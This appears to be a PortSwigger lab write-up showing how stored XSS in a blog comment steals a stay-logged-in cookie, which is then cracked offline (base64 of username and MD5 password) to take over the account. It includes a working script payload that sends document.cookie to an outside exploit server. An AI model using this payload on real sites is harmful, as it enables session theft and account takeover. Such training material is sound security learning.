🗂️PortSwigger Lab Writeup: Offline Password Cracking

PortSwigger lab description page for Authentication - Offline password cracking

🎯 Objective

The objective of this lab is to exploit an authentication weakness where the app contains an XSS vulnerability in the comment functionality as well as incorrectly implements stay-logged-in feature. The goal is to steal the stay-logged-in cookie of carlos, crack it to obtain the password and log in as carlos and delete his account from the "My account" page.

Lab URL: https://portswigger.net/web-security/authentication/other-mechanisms/lab-offline-password-cracking
Category: Authentication
Difficulty: Practitioner

🧪 Exploitation Steps

🕵️Step 1: Observe the Website

Firstly open the lab URL in your browser, and observe what it is about and how it works.
At first glance, the website seems to be a blogging website with a login page. In the lab description, it is mentioned that we need to steal the stay-logged-in cookie of user - carlos and log in to account.

📝Step 2: Try Stay-logged-in Feature

Now we will first observe how stay-logged-in feature works by logging in as wiener:peter.
Now, we are being logged-in as wiener where we now have a feature to Delete account.
Under the HTTP History in Burpsuite, see the /login request and its response.
We notice a new cookie - stay-logged-in being set by the application which is used to persist the user session without again asking user credentials for login.
Now, In Decoder we Smart decode the stay-logged-in cookie value.
Hence, we find that the cookie value is base64 encoding of something linked to the user which is being used by app in the backend to know which user is logging again.
We now try finding out the actual value of a hash provided with username wiener:. I tried finding out the hash on some websites and got to know the actual value of it.
Hence, the app sets the stay-logged-in cookie with base64(username:md5(password)) through which it detects in the backend which user is logging again.

🚀Step 3: Exploit using XSS

Now we will steal the stay-logged-in cookie of carlos through XSS in comment functionality.
First go to the exploit server and make a note of the URL.

Go to one of the blogs and post a comment containing the following stored XSS payload with your own exploit server ID:

<script>document.location='https://exploit-0a8900f403fc83ce83339bc201860066.exploit-
server.net/exploit/'+document.cookie</script>

Stored XSS payload in blog comment stealing stay-logged-in cookie

Now on the exploit server, open the access log. There should be a GET request containing the stay-logged-in cookie.
Copy the stay-logged-in cookie value and paste it into the Decoder in Burpsuite and smart decode it.
Copy the hashed password of carlos and crack it using any cracking websites.
Hence, cracking the password hash of carlos results in value of onceuponatime

🧑‍💼Step 4: Log in as carlos

Now, log in as carlos with the credentials we just cracked it.
Now delete the account of carlos to solve the lab.
And Finally, the Lab is solved.

🧠 Conclusion

This lab demonstrated how XSS vulnerabilities combined with weak cookie implementation can lead to account compromise. By stealing the stay-logged-in cookie through stored XSS and offline password cracking, we successfully obtained the carlos account credentials.
Such vulnerabilities have a critical impact — they enable complete account takeover and privilege escalation.
Fix: implement Content Security Policy (CSP) to prevent XSS, use cryptographically secure session tokens, add rate-limiting / account lockouts, use strong password hashing (bcrypt/Argon2), implement MFA, and sanitize all user inputs.

🎯 Objective​

🧪 Exploitation Steps​

🕵️Step 1: Observe the Website​

📝Step 2: Try Stay-logged-in Feature​

🚀Step 3: Exploit using XSS​

🧑‍💼Step 4: Log in as carlos​

🧠 Conclusion​